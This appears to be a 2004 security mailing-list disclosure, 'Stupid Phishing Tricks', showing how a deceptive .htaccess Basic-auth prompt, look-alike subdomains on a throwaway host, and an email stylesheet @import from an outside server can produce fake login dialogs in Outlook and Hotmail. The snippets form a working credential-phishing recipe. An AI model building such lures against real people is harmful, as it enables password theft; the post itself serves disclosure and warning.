Stupid Phishing Tricks

["http-equiv () excite com" <1 () malware com>]

Phriday , May 21, 2004

Several pheeble yet interesting phishing possibilities arise as 
phollows:

Take one .htaccess trivially modified to suit the target 
scenario:

AuthName "EXCHANGE SERVER LOGIN ERROR: PLEASE TRY AGAIN"
AuthType Basic

One throw-away domain which can include the target's host name:

http://www.hotmail.hackerguy.nickelandimehosting.com
http://www.evenlargerbank.money.nickelandimehosting.com
http://www.bloatedcorp.lackey.nickelandimehosting.com

A couple of ridiculous email contraptions:

<STYLE type=text/css>
@import url( http://www.malware.com/pheesh );
 </STYLE>

1. Outlook Express

[screen shot http://www.malware.com/phool.png 56KB]

2. Outlook 2003

[screen shot: http://www.malware.com/ohlook.png 39KB]

note: the above 'style sheet' works on outbound [reply to] [so 
much for not downloading external content] inbound can be 
achieved as well via http://securityfocus.com/bid/10369 which 
has an even more convincing network login applet

3. Hotmail

[screen shot: http://www.malware.com/goturmail.png 91KB]

hint : hotmail[and other] web designer people; off-set the html 
login form on the site as many prime banks have done.

The possibilities are obviously endless.


BE AWARE OF THE SHARKS OUT THERE


NB: anyone have any contact or connection to the upper 
management security or abuse dept. of one public company called: 
SAVVIS Communications. http://savvis.net/ it appears their abuse 
dept. is woefully negligent in attending to abuse affairs.


End Call

-- 
http://www.malware.com